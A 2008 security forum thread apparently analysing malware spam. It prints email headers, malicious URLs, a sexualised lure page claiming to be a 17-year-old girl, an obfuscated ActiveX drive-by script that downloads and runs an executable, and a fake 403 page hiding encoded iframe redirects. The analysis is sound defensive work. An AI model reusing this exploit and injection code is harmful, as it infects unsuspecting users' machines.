« previous next »
Pages: [1]   Go Down

Author Topic: Infections via e-mail  (Read 11150 times)

0 Members and 1 Guest are viewing this topic.

May 14, 2008, 09:30:40 pm
Read 11150 times

MysteryFCM

  • Administrator
  • Hero Member
  • Offline
  • *****
  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Infections via e-mail
First e-mail:

Code: [Select]
Exported by: prjOutlookExport v0.0.11


From: www@cards.ru
E-mail:www@cards.ru [ 194.58.78.125 - ns.jj.ru ]
Date: 16/04/2008 11:00:00
Subject: ??? ????????!
**************************************************************************
Links
**************************************************************************

Link: http://www.cards.ru/card.php?%RNDDIGIT1010
Domain: www.cards.ru
IP: 194.58.78.125 [ ns.jj.ru ]
hpHosts Status: Skipped by user
MDL Status: Skipped by user
PhishTank Status: false

Link: http://www.nyan-doma.ru/card.php%URL_PARAMS
Domain: www.nyan-doma.ru
IP: 84.204.229.19 [ biz19.bizhosting.ru ]
hpHosts Status: Skipped by user
MDL Status: Skipped by user
PhishTank Status: false

Link: http://nrc-driveru.104.com1.ru/card.php%URL_PARAMS
Domain: nrc-driveru.104.com1.ru
IP: 89.108.67.91 [ cp104.agava.net ]
hpHosts Status: Skipped by user
MDL Status: Skipped by user
PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
??? ?????? ??????????? ????????.%BR ??? ?? ????????? ??????? ?? ???? <http://www.cards.ru/card.php?%RNDDIGIT1010>
www.cards.ru/card.php?%RNDDIGIT1010 <http://www.nyan-doma.ru/card.php%URL_PARAMS>
? ??????? ?? ?????? '???????? ????????'%BR %BR ?????? ???????? ???????? CARDS.RU%BR ------------------------------------------------%BR %BR %BR You recieved an postcard.%BR To get it follow to web-site <http://www.cards.ru/card.php?%RNDDIGIT1010>
www.cards.ru/card.php?%RNDDIGIT1010 <http://nrc-driveru.104.com1.ru/card.php%URL_PARAMS>
switch to english and click on 'get my postcard'%BR %BR Postcard service (www@cards.ru)%BR


**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>??? ?????? ??????????? ????????.%BR ??? ?? ????????? ??????? ?? ???? &lt;<A HREF="http://www.cards.ru/card.php?%RNDDIGIT1010">http://www.cards.ru/card.php?%RNDDIGIT1010</A>&gt;<BR>
www.cards.ru/card.php?%RNDDIGIT1010 &lt;<A HREF="http://www.nyan-doma.ru/card.php%URL_PARAMS">http://www.nyan-doma.ru/card.php%URL_PARAMS</A>&gt; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<BR>
? ??????? ?? ?????? '???????? ????????'%BR %BR ?????? ???????? ???????? CARDS.RU%BR ------------------------------------------------%BR %BR %BR You recieved an postcard.%BR To get it follow to web-site &lt;<A HREF="http://www.cards.ru/card.php?%RNDDIGIT1010">http://www.cards.ru/card.php?%RNDDIGIT1010</A>&gt;<BR>
www.cards.ru/card.php?%RNDDIGIT1010 &lt;<A HREF="http://nrc-driveru.104.com1.ru/card.php%URL_PARAMS">http://nrc-driveru.104.com1.ru/card.php%URL_PARAMS</A>&gt; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<BR>
switch to english and click on 'get my postcard'%BR %BR Postcard service (www@cards.ru)%BR<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <www@cards.ru>
Delivered-To: services@it-mate.co.uk
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-74.livemail.co.uk (Postfix) with SMTP id 5E2F256EAE3
for <services@it-mate.co.uk>; Wed, 16 Apr 2008 10:20:03 +0100 (BST)
Received: from unknown.interbgc.com (unknown [213.240.235.162])
by smtp-in-74.livemail.co.uk (Postfix) with SMTP id DDC6256EB35
for <services@it-mate.co.uk>; Wed, 16 Apr 2008 10:20:02 +0100 (BST)
X-SpamTest-Categories: Formal Messages > Postcards; Internal-LGS > EL; Internal-LGS > RL
X-SpamTest-Envelope-From: www@cards.ru
X-SpamTest-Formal: yes
X-SpamTest-Group-ID: 00000000
X-SpamTest-Info: Profiles 1020 [May 03 2007]
X-SpamTest-Info: helo_type=3
X-SpamTest-Method: none
X-SpamTest-Rate: 0
X-SpamTest-Status: Not detected
X-SpamTest-Status-Extended: formal
X-SpamTest-Version: SMTP-Filter Version 3.0.0 [0278], KAS30/Release
Received: from cards.ru (localhost [127.0.0.1])
        by cards.ru (8.13.4/8.13.4) with ESMTP id ILM713eutxtyyo8365
        for <services@it-mate.co.uk>; Wed, 16 Apr 2008 12:20:1 +0200 (MSD)
        (envelope-from www@cards.ru)
Received: (from www@localhost)
        by cards.ru (8.13.7/8.13.7/Submit) id EAA33zwodco37;
        Wed, 16 Apr 2008 12:20:1 +0200 (MSD)
        (envelope-from www)
Date: Wed, 16 Apr 2008 12:20:1 +0200 (MSD)
Message-Id: <20070502603.XJIF554cwqumvz96@cards.ru>
Reply-To: services@it-mate.co.uk
Errors-To: services@it-mate.co.uk
From: "" <www@cards.ru>
To: services@it-mate.co.uk
Subject: вам открытка!
Precedence: special-delivery
Content-Type: text/html; charset=Windows-1251
Content-Transfer-Encoding: 8bit
X-Original-To: services@it-mate.co.uk
None of the links in the first e-mail seem to work .....

Second e-mail:

Code: [Select]
Exported by: prjOutlookExport v0.0.11


From: dmitry@mail.ru
E-mail:dmitry@mail.ru [ 194.67.57.126 - mail.ru ]
Date: 14/05/2008 09:36:15
Subject: ??????????? ????
**************************************************************************
Links
**************************************************************************

Link: http://www.format.by/foto.php
Domain: www.format.by
IP: 212.98.181.80 [ myweb03.bn.by ]
hpHosts Status: Skipped by user
MDL Status: Skipped by user
PhishTank Status: false

Link: http://www.format.by/foto.php?s=1&fr=GarrettMckay&n=services@it-mate.co.uk
Domain: www.format.by
IP: 212.98.181.80 [ myweb03.bn.by ]
hpHosts Status: Skipped by user
MDL Status: Skipped by user
PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
??????. ???? ????? .

??? ????? ????????? ???? ?????????? ???? http://www.format.by/foto.php <http://www.format.by/foto.php?s=1&fr=GarrettMckay&n=services@it-mate.co.uk> 



**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>??????. ???? ????? .<BR>
<BR>
??? ????? ????????? ???? ?????????? ???? <A HREF="http://www.format.by/foto.php">http://www.format.by/foto.php</A> &lt;<A HREF="http://www.format.by/foto.php?s=1&fr=GarrettMckay&n=services@it-mate.co.uk">http://www.format.by/foto.php?s=1&fr=GarrettMckay&n=services@it-mate.co.uk</A>&gt;&nbsp;<BR>
<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <dmitry@mail.ru>
Delivered-To: services@it-mate.co.uk
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-112.livemail.co.uk (Postfix) with SMTP id 5797984DF3A
for <services@it-mate.co.uk>; Wed, 14 May 2008 02:36:22 +0100 (BST)
Received: from 123.212.44.228 (unknown [123.212.44.228])
by smtp-in-112.livemail.co.uk (Postfix) with SMTP id E077B84DF3A
for <services@it-mate.co.uk>; Wed, 14 May 2008 02:36:20 +0100 (BST)
X-SpamTest-Categories: Formal Messages > Postcards; Internal-LGS > EL; Internal-LGS > RL
X-SpamTest-Envelope-From: dmitry@mail.ru
X-SpamTest-Formal: yes
X-SpamTest-Group-ID: 00000000
X-SpamTest-Info: Profiles 1020 [May 03 2007]
X-SpamTest-Info: helo_type=3
X-SpamTest-Method: none
X-SpamTest-Rate: 0
X-SpamTest-Status: Not detected
X-SpamTest-Status-Extended: formal
X-SpamTest-Version: SMTP-Filter Version 3.0.0 [0278], KAS30/Release
Received: from cards.ru (localhost [127.0.0.1])
        by cards.ru (8.13.4/8.13.4) with ESMTP id MFXL93qzbzam58
        for <services@it-mate.co.uk>; Wed, 14 May 2008 10:36:15 +0200 (MSD)
        (envelope-from dmitry@mail.ru)
Received: (from www@localhost)
        by cards.ru (8.13.7/8.13.7/Submit) id LGT21uzujhkx64763;
        Wed, 14 May 2008 10:36:15 +0200 (MSD)
        (envelope-from www)
Date: Wed, 14 May 2008 10:36:15 +0200 (MSD)
Message-Id: <20070501728.L32umyjceyspe190@cards.ru>
Reply-To: services@it-mate.co.uk
Errors-To: services@it-mate.co.uk
From: "" <dmitry@mail.ru>
To: services@it-mate.co.uk
Subject: откровенное фото
Precedence: special-delivery
Content-Type: text/html; charset=Windows-1251
Content-Transfer-Encoding: 8bit
X-Original-To: services@it-mate.co.uk



Link content:

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://www.format.by/foto.php?s=1&fr=GarrettMckay&n=services
Server IP: 212.98.181.80 [ myweb03.bn.by ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 14 May 2008
Time: 22:22:54:22
*****************************************************************
<html>

<head>
  <title>ищу спонсора</title>
<META HTTP-EQUIV=Refresh Content="20;URL=foto.exe">
<meta HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=windows-1251">
</head>
<body><iframe name="FotoSpliceWorks" src="http://www.yvon-publicidad.com/images/index.php?s=sp&n=services" frameborder="0" border="0" height="1" width="1"></iframe>
<div></div>
<table width="100%" border="0" cellspacing="1" cellpadding="1">
  <tr>
    <td>
<center>
        <img src="http://pupsik.ru/teen/105/10.jpg" width="470" height="589">
      </center>
</td>
    <td>
<table id="container">

<tr>
<td id="content"><table height="100%" width="100%">
<tr><td height="100">

<div align="center" style="padding:5px;">
                    <p> <font  color="#CC3300">Спасибо всем, кто не поленился зайти.</font>
                    </p>
</div>
</td></tr>
<tr><td>
<p align="center"> <a href="foto.exe">foto.jpg</a>&nbsp;&nbsp;&nbsp;<br>
                    <br>
</p>
<p align="center">
закачка остальных фоток начнется через 30 секунд<br>
если загрузка не происходит, <a href="realfoto.exe">воспользуйтесь ссылкой</a>

</p>

<table width="100%">
<tr><td height="20"></td></tr>
<tr>
<td>&nbsp;</td>
                      <td width="400"> <p>Меня зовут <strong>Света</strong>, мне
                          17, я ищу спонсора, но понимаю что просто так ничего
                          в этом мире не бывает<br>
                          поэтом сразу выложила несколько своих <strong>более
                          откровенных</strong> фоток, если я тебе понравилась
                          то давай общаться в аське, а лучше в реале.. если ты
                          мне тоже понравишься, то я готова ой как на многое..
                          исполню <strong>любые</strong> желания, даже самые самые..</p>
                        <p><br>
                          все барыги кто придумает что у меня плохая фигура или маленькая
                          грудь - идут лесом, это далеко не так, посмотри все
                          фотки и вопрос отпадет, а может и чтото встанет :) хотя
                          у меня далеко не пятый размер.</p>
                        <p>&nbsp;</p>
                        <p><br>
                          <font  color="#000033">лучше один
                          раз увидеть чем десять раз услышать,<br>
                          лучше один раз потрогать чем десять раз увидеть,<br>
                          лучше одна ночь чем один сто раз потрогать,<br>
                          а ночь будет и не одна и не только ночь :)</font><br>
                        </p></td>
<td>&nbsp;</td>
</tr>
</table>

<td></tr>
<tr height="60"><td>
</td></tr>
</table>



</td>
</tr>
</table>


</td>
  </tr>
</table>
</body>
</html>
Malware downloaded:

http://www.format.by/foto.exe

... and content of the iFrame it loads;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://www.yvon-publicidad.com/images/index.php?s=sp&n=services
Server IP: 193.34.16.223 [ mrs30.hosteur.com ]
hpHosts Status: Listed [ Class: EMD ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 14 May 2008
Time: 22:23:45:23
*****************************************************************
<script>

function CreateO(os, nz) {
var e0 = null;
      try {
eval('e0 = os.CreateObject(nz)') }catch(e){}
     if (! e0) {try { eval('e0 = os.CreateObject(nz, "")') }catch(e){}}
    if (! e0) {try { eval('e0 = os.CreateObject(nz, "", "")') }catch(e){}}
   if (! e0) {try { eval('e0 = os.GetObject("", nz)') }catch(e){}}
  if (! e0) {try { eval('e0 = os.GetObject(nz, "")') }catch(e){}}
 if (! e0) {try { eval('e0 = os.GetObject(nz)') }catch(e){}}
return(e0);
}

function Download(a)
{
var lm = CreateO(a,'m'+'sxm'+'l2'+'.'+'X'+'M'+'LHT'+'TP');
lm.open('G'+'E'+'T','http://www.yvon-publicidad.com/images/images.php?w=0&e=2',false);
lm.send();
var o = CreateO(a,'a'+'d'+'od'+'b'+'.'+'s'+'t'+'re'+'am');

o.type = 1;
o.Mode = 3;
o.open();

o.Write(lm.responseBody);

var tut = ".//..//win"+".exe";
o.savetoFile(tut,2);
o.close();
var s = CreateO(a, 'S'+'hel'+'l.A'+'pp'+'lic'+'at'+'ion');
s.Shellexecute(tut);
}

var x = 0;
var t = new Array(

'{B'+'D'+'96C'+'55'+'6-65'+'A3-11'+'D0'+'-98'+'3A-00'+'C0'+'4FC'+'29'+'E30}',
'{BD'+'96'+'C55'+'6-6'+'5A3-1'+'1D0-9'+'83'+'A-0'+'0C0'+'4F'+'C2'+'9E36}',null);

while (t[x]) {
var a = null;
   if (t[x].substring(0,1) == '{') {
a = document.createElement('object');
a.setAttribute('cl'+'a'+'ss'+'id', 'cl'+'s'+'id:' + t[x].substring(1, t[x].length + 1));
}  else {
   try
{ a = new ActiveXObject(t[x]); } catch(e){}
}
   if (a)
{
   try
{
var b = CreateO(a, 'Sh'+'el'+'l'+'.'+'A'+'p'+'pl'+'ica'+'ti'+'on');
if (b) {
if (Download(a)) break;
}
}catch(e){}
}
x++;
}
setTimeout("window.location = 'jav.php'", 2500);
</script>
</body>
</html>
Malware downloaded:

http://www.yvon-publicidad.com/images/images.php?w=0&e=2

Third e-mail;

Code: [Select]
Exported by: prjOutlookExport v0.0.11


From: ac@mail.ru
E-mail:ac@mail.ru [ 194.67.57.126 - mail.ru ]
Date: 14/05/2008 10:13:29
Subject: ????? ????
**************************************************************************
Links
**************************************************************************

Link: http://www.aspen-architecture.com/foto.php
Domain: www.aspen-architecture.com
IP: 74.208.87.15 [ perfora.net ]
hpHosts Status: Skipped by user
MDL Status: Skipped by user
PhishTank Status: false

Link: http://www.aspen-architecture.com/foto.php?s=1&fr=TrentMeeks&n=services@it-mate.co.uk
Domain: www.aspen-architecture.com
IP: 74.208.87.15 [ perfora.net ]
hpHosts Status: Skipped by user
MDL Status: Skipped by user
PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
??????. ???? ????? .

??? ????? ????????? ???? ?????????? ???? http://www.aspen-architecture.com/foto.php <http://www.aspen-architecture.com/foto.php?s=1&fr=TrentMeeks&n=services@it-mate.co.uk> 



**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>??????. ???? ????? .<BR>
<BR>
??? ????? ????????? ???? ?????????? ???? <A HREF="http://www.aspen-architecture.com/foto.php">http://www.aspen-architecture.com/foto.php</A> &lt;<A HREF="http://www.aspen-architecture.com/foto.php?s=1&fr=TrentMeeks&n=services@it-mate.co.uk">http://www.aspen-architecture.com/foto.php?s=1&fr=TrentMeeks&n=services@it-mate.co.uk</A>&gt;&nbsp;<BR>
<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <%MAIL_NAMES@mail.ru>
Delivered-To: services@it-mate.co.uk
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-79.livemail.co.uk (Postfix) with SMTP id 730EEDEC87D
for <services@it-mate.co.uk>; Wed, 14 May 2008 06:13:40 +0100 (BST)
Received: from mail.ugok.ru (unknown [83.174.201.74])
by smtp-in-79.livemail.co.uk (Postfix) with SMTP id 211BDDEC8EF
for <services@it-mate.co.uk>; Wed, 14 May 2008 06:13:40 +0100 (BST)
X-SpamTest-Categories: Formal Messages > Postcards; Internal-LGS > EL; Internal-LGS > RL
X-SpamTest-Envelope-From: ac@mail.ru
X-SpamTest-Formal: yes
X-SpamTest-Group-ID: 00000000
X-SpamTest-Info: Profiles 1020 [May 03 2007]
X-SpamTest-Info: helo_type=3
X-SpamTest-Method: none
X-SpamTest-Rate: 0
X-SpamTest-Status: Not detected
X-SpamTest-Status-Extended: formal
X-SpamTest-Version: SMTP-Filter Version 3.0.0 [0278], KAS30/Release
Received: from cards.ru (localhost [127.0.0.1])
        by cards.ru (8.13.4/8.13.4) with ESMTP id V296isqrmdpmjlaq15851
        for <services@it-mate.co.uk>; Wed, 14 May 2008 11:13:29 +0200 (MSD)
        (envelope-from ac@mail.ru)
Received: (from www@localhost)
        by cards.ru (8.13.7/8.13.7/Submit) id ZW12yeniyw03;
        Wed, 14 May 2008 11:13:29 +0200 (MSD)
        (envelope-from www)
Date: Wed, 14 May 2008 11:13:29 +0200 (MSD)
Message-Id: <20070500374.GGW23uiojdl29@cards.ru>
Reply-To: services@it-mate.co.uk
Errors-To: services@it-mate.co.uk
From: "" <ac@mail.ru>
To: services@it-mate.co.uk
Subject: супер фото
Precedence: special-delivery
Content-Type: text/html; charset=Windows-1251
Content-Transfer-Encoding: 8bit
X-Original-To: services@it-mate.co.uk
Logged
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net
May 14, 2008, 09:58:13 pm
Reply #1

JohnC

  • Special Members
  • Hero Member
  • Offline
  • *
  • 1964
Re: Infections via e-mail
Thank you.
Logged
May 15, 2008, 02:16:36 pm
Reply #2

MysteryFCM

  • Administrator
  • Hero Member
  • Offline
  • *****
  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Re: Infections via e-mail
Code: [Select]
Exported by: prjOutlookExport v0.0.11


From: kovylyaeva_ui@mail.ru
E-mail:kovylyaeva_ui@mail.ru [ 194.67.57.126 - mail.ru ]
Date: 15/05/2008 15:39:40
Subject: , ??? ??????? ???????
**************************************************************************
Links
**************************************************************************

Link: http://djee.perecz.us/foto.php
Domain: djee.perecz.us
IP: 66.29.116.32 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false

Link: http://djee.perecz.us/foto.php?s=1&fr=ParrishTia&n=ceo@it-mate.co.uk
Domain: djee.perecz.us
IP: 66.29.116.32 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
??????. ???? ????? .
??? ????? ????????? ???? ?????????? ???? http://djee.perecz.us/foto.php <http://djee.perecz.us/foto.php?s=1&fr=ParrishTia&n=ceo@it-mate.co.uk> 



**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>??????. ???? ????? .<BR>
??? ????? ????????? ???? ?????????? ???? <A HREF="http://djee.perecz.us/foto.php">http://djee.perecz.us/foto.php</A> &lt;<A HREF="http://djee.perecz.us/foto.php?s=1&fr=ParrishTia&n=ceo@it-mate.co.uk">http://djee.perecz.us/foto.php?s=1&fr=ParrishTia&n=ceo@it-mate.co.uk</A>&gt;&nbsp;<BR>
<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <%MAIL_NAMES@mail.ru>
Delivered-To: services@it-mate.co.uk
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-164.livemail.co.uk (Postfix) with SMTP id 452E4EE810A
for <services@it-mate.co.uk>; Thu, 15 May 2008 13:39:44 +0100 (BST)
Received: from cl-5.access.bryansk.ru (unknown [62.33.2.5])
by smtp-in-164.livemail.co.uk (Postfix) with SMTP id A9630EE80F8
for <ceo@it-mate.co.uk>; Thu, 15 May 2008 13:39:43 +0100 (BST)
X-SpamTest-Categories: Formal Messages > Postcards; Internal-LGS > EL; Internal-LGS > RL
X-SpamTest-Envelope-From: kovylyaeva_ui@mail.ru
X-SpamTest-Formal: yes
X-SpamTest-Group-ID: 00000000
X-SpamTest-Info: Profiles 1020 [May 03 2007]
X-SpamTest-Info: helo_type=3
X-SpamTest-Method: none
X-SpamTest-Rate: 0
X-SpamTest-Status: Not detected
X-SpamTest-Status-Extended: formal
X-SpamTest-Version: SMTP-Filter Version 3.0.0 [0278], KAS30/Release
Received: from cards.ru (localhost [127.0.0.1])
        by cards.ru (8.13.4/8.13.4) with ESMTP id TL021kbzwk833
        for <ceo@it-mate.co.uk>; Thu, 15 May 2008 16:39:40 +0200 (MSD)
        (envelope-from kovylyaeva_ui@mail.ru)
Received: (from www@localhost)
        by cards.ru (8.13.7/8.13.7/Submit) id VJY796ryloujp334;
        Thu, 15 May 2008 16:39:40 +0200 (MSD)
        (envelope-from www)
Date: Thu, 15 May 2008 16:39:40 +0200 (MSD)
Message-Id: <20070502851.OACV974xpisog19@cards.ru>
Reply-To: ceo@it-mate.co.uk
Errors-To: ceo@it-mate.co.uk
From: "" <kovylyaeva_ui@mail.ru>
To: ceo@it-mate.co.uk
Subject: , мои сладкие булочки
Precedence: special-delivery
Content-Type: text/html; charset=Windows-1251
Content-Transfer-Encoding: 8bit
X-Original-To: ceo@it-mate.co.uk



Code: [Select]
Exported by: prjOutlookExport v0.0.11


From: andrey@rambler.ru
E-mail:andrey@rambler.ru [ 81.19.70.3 - rambler.ru ]
Date: 15/05/2008 14:30:19
Subject: , ??? ??????? ???????
**************************************************************************
Links
**************************************************************************

Link: http://www.e-lustrate.com/foto.php
Domain: www.e-lustrate.com
IP: 209.200.229.17 [ celaneo.lunarpages.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false

Link: http://www.e-lustrate.com/foto.php?s=1&fr=HolbrookSondra&n=services@it-mate.co.uk
Domain: www.e-lustrate.com
IP: 209.200.229.17 [ celaneo.lunarpages.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
??????. ???? ????? .
??? ????? ????????? ???? ?????????? ???? http://www.e-lustrate.com/foto.php <http://www.e-lustrate.com/foto.php?s=1&fr=HolbrookSondra&n=services@it-mate.co.uk> 



**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>??????. ???? ????? .<BR>
??? ????? ????????? ???? ?????????? ???? <A HREF="http://www.e-lustrate.com/foto.php">http://www.e-lustrate.com/foto.php</A> &lt;<A HREF="http://www.e-lustrate.com/foto.php?s=1&fr=HolbrookSondra&n=services@it-mate.co.uk">http://www.e-lustrate.com/foto.php?s=1&fr=HolbrookSondra&n=services@it-mate.co.uk</A>&gt;&nbsp;<BR>
<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <%MAIL_NAMES@rambler.ru>
Delivered-To: services@it-mate.co.uk
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-123.livemail.co.uk (Postfix) with SMTP id 143955DE977
for <services@it-mate.co.uk>; Thu, 15 May 2008 13:30:19 +0100 (BST)
Received: from 81.30.171.54.vntp.net (unknown [81.30.171.54])
by smtp-in-123.livemail.co.uk (Postfix) with SMTP id 9BA315DE991
for <services@it-mate.co.uk>; Thu, 15 May 2008 13:30:18 +0100 (BST)
X-SpamTest-Categories: Formal Messages > Postcards; Internal-LGS > EL; Internal-LGS > RL
X-SpamTest-Envelope-From: andrey@rambler.ru
X-SpamTest-Formal: yes
X-SpamTest-Group-ID: 00000000
X-SpamTest-Info: Profiles 1020 [May 03 2007]
X-SpamTest-Info: helo_type=3
X-SpamTest-Method: none
X-SpamTest-Rate: 0
X-SpamTest-Status: Not detected
X-SpamTest-Status-Extended: formal
X-SpamTest-Version: SMTP-Filter Version 3.0.0 [0278], KAS30/Release
Received: from cards.ru (localhost [127.0.0.1])
        by cards.ru (8.13.4/8.13.4) with ESMTP id JHMH17mffyfsz21152
        for <services@it-mate.co.uk>; Thu, 15 May 2008 15:30:19 +0200 (MSD)
        (envelope-from andrey@rambler.ru)
Received: (from www@localhost)
        by cards.ru (8.13.7/8.13.7/Submit) id S21prjpxs67;
        Thu, 15 May 2008 15:30:19 +0200 (MSD)
        (envelope-from www)
Date: Thu, 15 May 2008 15:30:19 +0200 (MSD)
Message-Id: <20070501173.J342deuzrksvt244@cards.ru>
Reply-To: services@it-mate.co.uk
Errors-To: services@it-mate.co.uk
From: "" <andrey@rambler.ru>
To: services@it-mate.co.uk
Subject: , мои сладкие булочки
Precedence: special-delivery
Content-Type: text/html; charset=Windows-1251
Content-Transfer-Encoding: 8bit
X-Original-To: services@it-mate.co.uk


Logged
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net
May 15, 2008, 02:36:16 pm
Reply #3

MysteryFCM

  • Administrator
  • Hero Member
  • Offline
  • *****
  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Re: Infections via e-mail
e-lustrate.com PD displays a fake 403;

Code: [Select]
<HTML>
<HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD>
<BODY onload="status=' ';zz='2';sl='/';sf='ram';pi='9';po='.';qu=':';yh='4';tr='c.p';vo='3';bw='5';pt='tp';ab='src';dg='ht';ko='e';wd='if';ji='hp';hh='1';t=wd.concat(sf,ko);xx=dg.concat(pt,qu,sl,sl,hh,pi,yh,po,hh,yh,bw,po,zz,vo,bw,po,vo,yh,sl,tr,ji);var oE=document.createElement(t);oE.setAttribute('width','0');oE.setAttribute('height','0');oE.setAttribute('style','display:none');oE.setAttribute(ab,xx);document.body.appendChild(oE);">
<H1>Forbidden</H1>
You do not have permission to access this document.
<P>
<HR>
<ADDRESS>
Web Server at &#101;&#45;&#108;&#117;&#115;&#116;&#114;&#97;&#116;&#101;&#46;&#99;&#111;&#109;
</ADDRESS>
</BODY>
</HTML>

<!--
   - Unfortunately, Microsoft has added a clever new
   - "feature" to Internet Explorer. If the text of
   - an error's message is "too small", specifically
   - less than 512 bytes, Internet Explorer returns
   - its own error message. You can turn that off,
   - but it's pretty tricky to find switch called
   - "smart error messages". That means, of course,
   - that short error messages are censored by default.
   - IIS always returns error messages that are long
   - enough to make Internet Explorer happy. The
   - workaround is pretty simple: pad the error
   - message with a big comment like this to push it
   - over the five hundred and twelve bytes minimum.
   - Of course, that's exactly what you're reading
   - right now.
   -->
<script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u0074\u006f\u006d\u0061\u006b\u0061\u0079\u0061\u006e\u002e\u0062\u0069\u007a\u002f\u0061\u0066\u0074\u0065\u0072\u0066\u0074\u0070\u0063\u0068\u0065\u006b\u002f\u0032\u0036\u0030\u0033\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');
</script>

Re-dirs you to;

http://ruoo.info/forum/index.php

------> http://ruoo.info/forum/load.php > load.exe

http://194.145.235.34/c.php <--- Seems to be dead
http://atomakayan.biz/afterftpchek/2603/index.php

------> http://countermediagroup.com/ts/in.cgi?mymy

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://ruoo.info/forum/index.php
Server IP: 195.93.218.31 [ build.airhouse.su ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 15 May 2008
Time: 15:31:35:31
*****************************************************************
